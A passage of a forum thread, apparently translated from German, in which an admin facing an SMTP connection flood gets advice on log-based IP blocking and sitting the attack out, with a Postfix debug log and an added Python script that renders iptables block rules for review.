Dec  6 16:50:40 mail postfix/smtpd[56782]: resolve_clnt: `vprimarily@XXXXXXX.com' -> transp=`local' host=`mail.XXXXXXX.com' rcpt=`vprimarily@XXXXXXX.com' flags= class=local
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: install entry key vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: result: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: >>> START Helo command RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[56782]: permit_mynetworks: lsh810.siteprotect.co.kr 66.232.138.26
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostname: lsh810.siteprotect.co.kr ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostaddr: 66.232.138.26 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostname: lsh810.siteprotect.co.kr ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostaddr: 66.232.138.26 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_list_match: lsh810.siteprotect.co.kr: no match
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_list_match: 66.232.138.26: no match
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_unauth_destination: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: permit_auth_destination: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: leave existing entry key vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_non_fqdn_address: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_unknown_address: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: leave existing entry key vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_non_fqdn_hostname: lsh810.siteprotect.co.kr
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_invalid_hostname
------------------------------------------snap---------------------------
 
Turn the logging down massively; then the whole thing won't hit performance so hard.

But nothing helps against the mere establishment of a TCP connection. What helps more is a script that evaluates the (conspicuous) IPs from the mail log, puts them into a table together with a timestamp, and then blocks them for a few hours.

If your mail has a "fallback" (i.e. a 2nd MX), you could try simply switching off the smtpd for a few hours and sitting the whole thing out.
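An added example, in Python, of the log-evaluating blocker this post describes, combined with Sinepp's earlier suggestion of blocking whole ranges. It is not the poster's script and not code from the thread. It reads Postfix "connect from" lines, flags clients that exceed a connection count inside a sliding window, stores them with a timestamp in a block table that expires after a few hours, collapses offenders that share one /24 into a single range entry, and renders iptables rules as strings for review. The sample log lines, the year 2007 (syslog lines carry none), the limit of 5 connections per 60 seconds, the 3-hour hold, and the 3-hosts-per-/24 rule are all assumptions made for the demo.

```python
"""Evaluate a Postfix mail log the way the post above describes: find clients
that open too many connections in a short window, note them with a timestamp
in a block table, and expire them after a few hours. Added example, not the
poster's script; log lines are constructed and thresholds are assumptions.
Firewall commands are only rendered as strings, never executed."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

CONNECT_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: '
    r'connect from (?P<host>\S+)\[(?P<ip>[0-9.]+)\]'
)
YEAR = 2007                      # syslog lines carry no year; assumed for the sample
SAMPLE_NOW = datetime(2007, 12, 6, 16, 51)   # "now" for the demo run


def parse_connects(lines):
    """Yield (timestamp, ip) for every 'connect from' line; everything else is skipped."""
    for line in lines:
        m = CONNECT_RE.match(line)
        if m:
            yield datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S"), m["ip"]


def find_offenders(lines, max_conn=5, window=timedelta(seconds=60)):
    """ip -> time at which it exceeded max_conn connects inside one sliding window."""
    seen = defaultdict(list)
    for ts, ip in parse_connects(lines):
        seen[ip].append(ts)
    offenders = {}
    for ip, stamps in seen.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge
                start += 1
            if end - start + 1 > max_conn:
                offenders[ip] = ts
                break
    return offenders


def aggregate_ranges(offenders, min_hosts=3, prefix=24):
    """Sinepp's point: when several offenders share one /24, block the whole range."""
    nets = defaultdict(set)
    for ip in offenders:
        nets[ipaddress.ip_network(f"{ip}/{prefix}", strict=False)].add(ip)
    return {str(net) for net, ips in nets.items() if len(ips) >= min_hosts}


def build_block_table(offenders, now, hold=timedelta(hours=3), min_hosts=3):
    """target (IP or CIDR) -> expiry; IPs covered by a blocked range are not listed twice."""
    ranges = aggregate_ranges(offenders, min_hosts)
    table = {r: now + hold for r in ranges}
    for ip in offenders:
        if not any(ipaddress.ip_address(ip) in ipaddress.ip_network(r) for r in ranges):
            table[ip] = now + hold
    return table


def active_blocks(table, now):
    """Entries whose hold time has not run out; re-evaluate on every cron run."""
    return sorted(t for t, exp in table.items() if exp > now)


def iptables_rules(targets):
    """Render DROP rules for port 25 as strings for review; nothing is executed here."""
    return [f"iptables -I INPUT -s {t} -p tcp --dport 25 -j DROP" for t in targets]


def sample_log():
    """Constructed sample: one flooding host, three floods from one /24, one normal client."""
    lines = []
    def connects(ip, host, n, start_sec):
        for i in range(n):
            lines.append(f"Dec  6 16:50:{start_sec + i:02d} mail postfix/smtpd[3603{i}]: "
                         f"connect from {host}[{ip}]")
    connects("203.0.113.10", "unknown", 6, 10)
    for k in (5, 6, 7):
        connects(f"198.51.100.{k}", "unknown", 6, 20)
    connects("192.0.2.1", "mx.partner.example", 1, 30)
    lines.append("Dec  6 16:50:40 mail postfix/smtpd[36034]: disconnect from unknown[203.0.113.10]")
    return lines


def run_demo(now=SAMPLE_NOW):
    """Run the whole pipeline over the sample and return the results for inspection."""
    offenders = find_offenders(sample_log())
    table = build_block_table(offenders, now)
    return {
        "offenders": sorted(offenders),
        "ranges": aggregate_ranges(offenders),
        "active_now": active_blocks(table, now),
        "active_later": active_blocks(table, now + timedelta(hours=4)),
        "rules": iptables_rules(active_blocks(table, now)),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it from cron against the live mail log in place of the constructed sample, persisting the block table between runs so that expired entries are removed again. Matching only on "connect from" lines also catches the clients Ralf describes, which open a session, send nothing and disconnect, since Postfix logs the connection before any SMTP command arrives. Because the rules are only rendered, the operator decides what actually reaches the firewall.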
 
I already had the idea of "sitting it out". From Monday afternoon until Tuesday morning I stopped the mail service. Then the storm died down, and this morning it started up again in earnest.

The problem is: I suspect it involves tens of thousands of machines. Even the firewall will probably keel over trying to block them *lol*. I have already blocked 6,000 addresses, but for every one blocked, 3 new ones come along.

I am currently setting up a new mail server with a new domain; what else can you do :mad:
 
Nothing special

I wonder what you are hosting that somebody goes to this much effort.

Regards
Sinepp

The question of why somebody goes to so much effort would interest me very much as well. According to the LKA, after an attack like this you receive a letter with "information" on how, against the "insertion of coins", such "outages" can be prevented. So far nothing has arrived, though.
 
Maybe somebody mistyped an IP address. :) Or a textbook used a random IP address as a case study and now various students are trying their hand :-)

Well, whoever suffers the damage needn't worry about the ridicule...

Has it calmed down in the meantime?

Regards
Sinepp
 
It will be something along those lines :)

Our company is quite active in the Asian region. Maybe we "rubbed somebody the wrong way" there, although I like the textbook story better :D

By now just a few stray processes are still idling around, nothing that would disrupt operations. After 3 days it was practically over.
 